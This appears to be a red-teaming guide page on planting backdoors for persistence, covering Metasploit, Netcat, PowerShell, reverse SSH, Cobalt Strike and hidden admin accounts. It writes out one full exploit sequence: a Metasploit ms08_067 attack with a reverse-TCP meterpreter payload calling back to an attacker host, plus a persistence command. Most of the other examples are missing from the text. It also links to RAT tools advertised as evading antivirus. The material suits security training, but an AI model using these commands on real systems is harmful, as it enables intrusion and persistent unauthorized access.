search

Backdoors

hashtag
Practical Guide to Backdoors in Red Teaming

Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.

Creating a Persistent Meterpreter Session

Tool: Metasploit

Steps:

  • Exploit a vulnerability to gain an initial foothold.

  • Migrate to a stable process to maintain the session.

  • Set up persistence with a Meterpreter script.

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit

Once the session is established:

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.101

This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.

Using Netcat for a Simple Backdoor

Tool: Netcat

Steps:

  • Transfer Netcat to the target system.

  • Set up a persistent listener on the target system.

Example:

To make it persistent, add the command to a startup script:

Using PowerShell for Windows Persistence

Tool: PowerShell

Steps:

  • Create a PowerShell script to establish a reverse shell.

  • Use Task Scheduler to run the script at startup.

Example:

Save this script and schedule it using Task Scheduler:

Creating a Reverse SSH Tunnel

Tool: SSH

Steps:

  • Set up a reverse SSH tunnel to maintain access.

Example:

To make it persistent, add the command to cron:

Deploying Custom Backdoor with C2 Framework

Tool: Cobalt Strike

Steps:

  • Use Cobalt Strike to create a custom beacon.

  • Deploy the beacon on the target system and set it to call back periodically.

Example:

In Cobalt Strike:

Hidden User Accounts: Creating hidden user accounts with elevated privileges.

Example: Creating a Hidden Admin User on Windows:

Impact: The hidden user account provides the attacker with administrative access.

Some useful Backdoor references:

LogoGitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .GitHubchevron-right
LogoGitHub - karma9874/AndroRAT: A Simple android remote administration tool using sockets. It uses java on the client side and python on the server sideGitHubchevron-right
LogoGitHub - n1nj4sec/pupy: Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and CGitHubchevron-right
circle-info

Understanding and effectively implementing persistence and backdoor techniques are critical for simulating advanced attack scenarios in red teaming engagements. While common backdoors are increasingly detected by EDRs, some methods can still circumvent these defenses by using advanced Red Teaming techniques that we cover in our live Red Teaming workshops.

PreviousAttacking MSSQLNextPivoting & Tunneling

Last updated